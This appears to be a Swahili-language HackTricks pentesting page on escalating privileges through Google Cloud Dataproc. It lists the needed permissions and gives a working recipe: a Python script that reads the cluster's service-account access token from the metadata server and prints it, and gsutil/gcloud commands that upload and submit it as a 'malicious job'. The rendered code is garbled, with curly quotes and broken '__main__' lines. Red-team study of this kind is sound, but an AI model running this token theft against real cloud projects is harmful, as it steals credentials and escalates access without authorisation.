GCP Dataproc Kupandisha ruhusa

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Dataproc

GCP - Dataproc Enum

dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get

Siweza kupata reverse shell kwa kutumia njia hii; hata hivyo, inawezekana leak SA token kutoka kwenye metadata endpoint kwa kutumia njia iliyoelezewa hapa chini.

Hatua za kutekeleza exploit

  • Weka skripti ya job kwenye GCP Bucket

  • Wasilisha job kwa Dataproc cluster.

  • Tumia job kufikia metadata server.

  • Leak token ya service account inayotumika na cluster.

Python script to fetch SA token from metadata server ```python import requests

metadata_url = “http://metadata/computeMetadata/v1/instance/service-accounts/default/token” headers = {“Metadata-Flavor”: “Google”}

def fetch_metadata_token(): try: response = requests.get(metadata_url, headers=headers, timeout=5) response.raise_for_status() token = response.json().get(“access_token”, “”) print(f“Leaked Token: {token}“) return token except Exception as e: print(f“Error fetching metadata token: {e}”) return None

if name == “main”: fetch_metadata_token()

</details>

<details><summary>Tuma kazi yenye madhara kwenye cluster ya Dataproc</summary>
```bash
# Copy the script to the storage bucket
gsutil cp <python-script> gs://<bucket-name>/<python-script>

# Submit the malicious job
gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
--cluster=<cluster-name> \
--region=<region>

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks